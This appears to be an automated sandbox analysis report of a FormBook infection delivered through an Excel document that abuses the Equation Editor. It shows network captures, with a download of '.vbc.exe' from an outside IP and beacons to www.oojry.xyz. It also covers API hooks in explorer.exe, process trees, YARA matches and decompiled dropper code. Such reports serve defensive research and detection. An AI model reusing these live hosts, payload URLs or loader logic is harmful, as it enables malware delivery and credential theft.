                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Nov 25, 2021 19:24:41.570363998 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.oojry.xyz |  | 104.21.82.75 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:24:41.570363998 CET | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.oojry.xyz |  | 172.67.198.90 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.crystalsbyzoe.com | web.jimdosite.com |  | CNAME (Canonical name) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | web.jimdosite.com | dolphin-renderserve-prod.jimdo-platform.net |  | CNAME (Canonical name) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-renderserve-prod.jimdo-platform.net | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 34.246.239.131 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 52.208.193.50 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 54.154.18.62 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 52.17.6.255 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 52.210.254.88 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 54.171.119.91 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 52.209.227.237 | A (IP address) | IN (0x0001)
                                        Nov 25, 2021 19:25:03.035269022 CET | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dolphin-render-ce5083-1529577379-1289163597.eu-west-1.elb.amazonaws.com |  | 54.73.207.172 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 103.171.1.140
                                        • www.oojry.xyz
                                        • www.crystalsbyzoe.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.22 | 49165 | 103.171.1.140 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 25, 2021 19:23:23.232670069 CET | 0 | OUT | GET /384500000_1/.vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 103.171.1.140
                                        Connection: Keep-Alive
                                        Nov 25, 2021 19:23:23.525060892 CET | 1 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 25 Nov 2021 18:23:23 GMT
                                        Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                        Last-Modified: Thu, 25 Nov 2021 04:13:29 GMT
                                        ETag: "7431e-5d195326272a0"
                                        Accept-Ranges: bytes
                                        Content-Length: 475934
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.22 | 49166 | 104.21.82.75 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 25, 2021 19:24:42.574367046 CET | 504 | OUT | GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1
                                        Host: www.oojry.xyz
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 25, 2021 19:24:42.622097015 CET | 505 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Thu, 25 Nov 2021 18:24:42 GMT
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Cache-Control: max-age=3600
                                        Expires: Thu, 25 Nov 2021 19:24:42 GMT
                                        Location: https://www.oojry.xyz/og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1f333Q7YxD9wZSdpuenGrz6d%2BGjRyyIm1tuxT%2BmFwQn0h72Dl79IkVH%2B2MFqfwt%2BkF0341pcYMNFuzeGGAi1cxsJc0u8Oz4ZTU4mQjgTypazhHcndvPmTWMV6NDjvpE9"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 6b3cea5a2864702e-FRA
                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        2 | 192.168.2.22 | 49168 | 34.246.239.131 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Nov 25, 2021 19:25:03.084229946 CET | 506 | OUT | GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1
                                        Host: www.crystalsbyzoe.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 25, 2021 19:25:03.131290913 CET | 506 | IN | HTTP/1.1 403 Forbidden
                                        Content-Type: text/html
                                        Date: Thu, 25 Nov 2021 18:25:03 GMT
                                        Server: nginx
                                        Vary: Accept-Encoding
                                        Content-Length: 159
                                        Connection: Close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 37 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.17.8.2</center></body></html>


                                        Code Manipulations

                                        User Modules

                                        Hook Summary

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA | INLINE | explorer.exe
                                        PeekMessageW | INLINE | explorer.exe
                                        GetMessageW | INLINE | explorer.exe
                                        GetMessageA | INLINE | explorer.exe

                                        Processes

                                        Process: explorer.exe, Module: USER32.dll
                                        Function Name | Hook Type | New Data
                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEF
                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEF
                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEF

                                        Statistics

                                        [Charts not reproduced: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior]

                                        System Behavior

                                        General

                                        Start time:19:23:13
                                        Start date:25/11/2021
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13faa0000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:23:35
                                        Start date:25/11/2021
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:19:23:40
                                        Start date:25/11/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:475934 bytes
                                        MD5 hash:4D1B51FE258BE32D346B3507ABEDDCB3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        General

                                        Start time:19:23:42
                                        Start date:25/11/2021
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:475934 bytes
                                        MD5 hash:4D1B51FE258BE32D346B3507ABEDDCB3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:19:23:44
                                        Start date:25/11/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xffa10000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        General

                                        Start time:19:23:56
                                        Start date:25/11/2021
                                        Path:C:\Windows\SysWOW64\cscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cscript.exe
                                        Imagebase:0xa40000
                                        File size:126976 bytes
                                        MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:19:24:01
                                        Start date:25/11/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\Public\vbc.exe"
                                        Imagebase:0x4a950000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Disassembly

                                        Code Analysis

                                          Executed Functions

                                          C-Code - Quality: 83%
                                          			_entry_() {
                                          				struct _SHFILEINFOA _v360;
                                          				struct _SECURITY_ATTRIBUTES* _v376;
                                          				char _v380;
                                          				CHAR* _v384;
                                          				char _v396;
                                          				int _v400;
                                          				int _v404;
                                          				CHAR* _v408;
                                          				intOrPtr _v412;
                                          				int _v416;
                                          				intOrPtr _v420;
                                          				struct _SECURITY_ATTRIBUTES* _v424;
                                          				void* _v432;
                                          				int _t34;
                                          				CHAR* _t39;
                                          				char* _t42;
                                          				signed int _t44;
                                          				void* _t48;
                                          				intOrPtr _t50;
                                          				signed int _t52;
                                          				signed int _t55;
                                          				int _t56;
                                          				signed int _t60;
                                          				intOrPtr _t71;
                                          				intOrPtr _t77;
                                          				void* _t79;
                                          				void* _t89;
                                          				void* _t91;
                                          				char* _t96;
                                          				signed int _t97;
                                          				void* _t98;
                                          				signed int _t99;
                                          				signed int _t100;
                                          				signed int _t103;
                                          				CHAR* _t105;
                                          				signed int _t106;
                                          				intOrPtr _t113;
                                          				char _t120;
                                          
                                          				_v376 = 0;
                                          				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                                          				_t99 = 0;
                                          				_v380 = 0x20;
                                          				__imp__#17();
                                          				_t34 = SetErrorMode(0x8001); // executed
                                          				__imp__OleInitialize(0); // executed
                                          				 *0x42ec18 = _t34;
                                          				 *0x42eb64 = E00405C49(8);
                                          				SHGetFileInfoA(0x428f90, 0,  &_v360, 0x160, 0); // executed
                                          				E0040592B("psfiki Setup", "NSIS Error");
                                          				_t39 = GetCommandLineA();
                                          				_t96 = "\"C:\\Users\\Public\\vbc.exe\" ";
                                          				E0040592B(_t96, _t39);
                                          				 *0x42eb60 = GetModuleHandleA(0);
                                          				_t42 = _t96;
                                          				if("\"C:\\Users\\Public\\vbc.exe\" " == 0x22) {
                                          					_v404 = 0x22;
                                          					_t42 =  &M00434001;
                                          				}
                                          				_t44 = CharNextA(E00405449(_t42, _v404));
                                          				_v404 = _t44;
                                          				while(1) {
                                          					_t91 =  *_t44;
                                          					_t109 = _t91;
                                          					if(_t91 == 0) {
                                          						break;
                                          					}
                                          					__eflags = _t91 - 0x20;
                                          					if(_t91 != 0x20) {
                                          						L5:
                                          						__eflags =  *_t44 - 0x22;
                                          						_v404 = 0x20;
                                          						if( *_t44 == 0x22) {
                                          							_t44 = _t44 + 1;
                                          							__eflags = _t44;
                                          							_v404 = 0x22;
                                          						}
                                          						__eflags =  *_t44 - 0x2f;
                                          						if( *_t44 != 0x2f) {
                                          							L15:
                                          							_t44 = E00405449(_t44, _v404);
                                          							__eflags =  *_t44 - 0x22;
                                          							if(__eflags == 0) {
                                          								_t44 = _t44 + 1;
                                          								__eflags = _t44;
                                          							}
                                          							continue;
                                          						} else {
                                          							_t44 = _t44 + 1;
                                          							__eflags =  *_t44 - 0x53;
                                          							if( *_t44 == 0x53) {
                                          								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                                          								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                                          									_t99 = _t99 | 0x00000002;
                                          									__eflags = _t99;
                                          								}
                                          							}
                                          							__eflags =  *_t44 - 0x4352434e;
                                          							if( *_t44 == 0x4352434e) {
                                          								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                                          								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                                          									_t99 = _t99 | 0x00000004;
                                          									__eflags = _t99;
                                          								}
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                                          							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                                          								 *((intOrPtr*)(_t44 - 2)) = 0;
                                          								_t45 = _t44 + 2;
                                          								__eflags = _t44 + 2;
                                          								E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t45);
                                          								L20:
                                          								_t105 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                          								GetTempPathA(0x400, _t105);
                                          								_t48 = E004030AF(_t109);
                                          								_t110 = _t48;
                                          								if(_t48 != 0) {
                                          									L22:
                                          									DeleteFileA("1033"); // executed
                                          									_t50 = E00402C0B(_t111, _t99); // executed
                                          									_v412 = _t50;
                                          									if(_t50 != 0) {
                                          										L32:
                                          										E00403464();
                                          										__imp__OleUninitialize();
                                          										if(_v408 == 0) {
                                          											__eflags =  *0x42ebf4; // 0x0
                                          											if(__eflags != 0) {
                                          												_t106 = E00405C49(3);
                                          												_t100 = E00405C49(4);
                                          												_t55 = E00405C49(5);
                                          												__eflags = _t106;
                                          												_t97 = _t55;
                                          												if(_t106 != 0) {
                                          													__eflags = _t100;
                                          													if(_t100 != 0) {
                                          														__eflags = _t97;
                                          														if(_t97 != 0) {
                                          															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                                          															__eflags = _t60;
                                          															if(_t60 != 0) {
                                          																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                                          																_v416 = 1;
                                          																_v404 = 2;
                                          																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                                          															}
                                          														}
                                          													}
                                          												}
                                          												_t56 = ExitWindowsEx(2, 0);
                                          												__eflags = _t56;
                                          												if(_t56 == 0) {
                                          													E0040140B(9);
                                          												}
                                          											}
                                          											_t52 =  *0x42ec0c; // 0xffffffff
                                          											__eflags = _t52 - 0xffffffff;
                                          											if(_t52 != 0xffffffff) {
                                          												_v400 = _t52;
                                          											}
                                          											ExitProcess(_v400);
                                          										}
                                          										E004051EC(_v408, 0x200010);
                                          										ExitProcess(2);
                                          									}
                                          									_t113 =  *0x42eb7c; // 0x0
                                          									if(_t113 == 0) {
                                          										L31:
                                          										 *0x42ec0c =  *0x42ec0c | 0xffffffff;
                                          										_v400 = E00403489();
                                          										goto L32;
                                          									}
                                          									_t103 = E00405449(_t96, 0);
                                          									while(_t103 >= _t96) {
                                          										__eflags =  *_t103 - 0x3d3f5f20;
                                          										if(__eflags == 0) {
                                          											break;
                                          										}
                                          										_t103 = _t103 - 1;
                                          										__eflags = _t103;
                                          									}
                                          									_t115 = _t103 - _t96;
                                          									_v408 = "Error launching installer";
                                          									if(_t103 < _t96) {
                                          										lstrcatA(_t105, "~nsu.tmp");
                                          										_t101 = "C:\\Users\\Public";
                                          										if(lstrcmpiA(_t105, "C:\\Users\\Public") == 0) {
                                          											goto L32;
                                          										}
                                          										CreateDirectoryA(_t105, 0);
                                          										SetCurrentDirectoryA(_t105);
                                          										_t120 = "C:\\Users\\Albus\\AppData\\Local\\Temp"; // 0x43
                                          										if(_t120 == 0) {
                                          											E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t101);
                                          										}
                                          										E0040592B(0x42f000, _v396);
                                          										 *0x42f400 = 0x41;
                                          										_t98 = 0x1a;
                                          										do {
                                          											_t71 =  *0x42eb70; // 0x2903c0
                                          											E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t71 + 0x120)));
                                          											DeleteFileA(0x428b90);
                                          											if(_v416 != 0 && CopyFileA("C:\\Users\\Public\\vbc.exe", 0x428b90, 1) != 0) {
                                          												_push(0);
                                          												_push(0x428b90);
                                          												E00405679();
                                          												_t77 =  *0x42eb70; // 0x2903c0
                                          												E0040594D(0, _t98, 0x428b90, 0x428b90,  *((intOrPtr*)(_t77 + 0x124)));
                                          												_t79 = E0040518B(0x428b90);
                                          												if(_t79 != 0) {
                                          													CloseHandle(_t79);
                                          													_v416 = 0;
                                          												}
                                          											}
                                          											 *0x42f400 =  *0x42f400 + 1;
                                          											_t98 = _t98 - 1;
                                          										} while (_t98 != 0);
                                          										_push(0);
                                          										_push(_t105);
                                          										E00405679();
                                          										goto L32;
                                          									}
                                          									 *_t103 = 0;
                                          									_t104 = _t103 + 4;
                                          									if(E004054FF(_t115, _t103 + 4) == 0) {
                                          										goto L32;
                                          									}
                                          									E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t104);
                                          									E0040592B("C:\\Users\\Albus\\AppData\\Local\\Temp", _t104);
                                          									_v424 = 0;
                                          									goto L31;
                                          								}
                                          								GetWindowsDirectoryA(_t105, 0x3fb);
                                          								lstrcatA(_t105, "\\Temp");
                                          								_t89 = E004030AF(_t110);
                                          								_t111 = _t89;
                                          								if(_t89 == 0) {
                                          									goto L32;
                                          								}
                                          								goto L22;
                                          							}
                                          							goto L15;
                                          						}
                                          					} else {
                                          						goto L4;
                                          					}
                                          					do {
                                          						L4:
                                          						_t44 = _t44 + 1;
                                          						__eflags =  *_t44 - 0x20;
                                          					} while ( *_t44 == 0x20);
                                          					goto L5;
                                          				}
                                          				goto L20;
                                          			}

                                          APIs
                                          • #17.COMCTL32 ref: 00403102
                                          • SetErrorMode.KERNEL32(00008001), ref: 0040310D
                                          • OleInitialize.OLE32(00000000), ref: 00403114
                                            • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                            • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?), ref: 00405C66
                                            • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?,?,00000000,00403126,00000008), ref: 00405C77
                                          • SHGetFileInfoA.SHELL32(00428F90,00000000,?,00000160,00000000,00000008), ref: 0040313C
                                            • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,psfiki Setup,NSIS Error), ref: 00405938
                                          • GetCommandLineA.KERNEL32(psfiki Setup,NSIS Error), ref: 00403151
                                          • GetModuleHandleA.KERNEL32(00000000,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403164
                                          • CharNextA.USER32(00000000), ref: 0040318F
                                          • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403222
                                          • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403237
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403243
                                          • DeleteFileA.KERNEL32(1033), ref: 00403256
                                          • OleUninitialize.OLE32 ref: 004032D4
                                          • ExitProcess.KERNEL32 ref: 004032F4
                                          • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 00403300
                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\Public\vbc.exe" ,00000000,00000000), ref: 0040330C
                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403318
                                          • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040331F
                                          • DeleteFileA.KERNEL32(00428B90,00428B90,?,0042F000,?), ref: 00403369
                                          • CopyFileA.KERNEL32 ref: 0040337D
                                          • CloseHandle.KERNEL32(00000000), ref: 004033AA
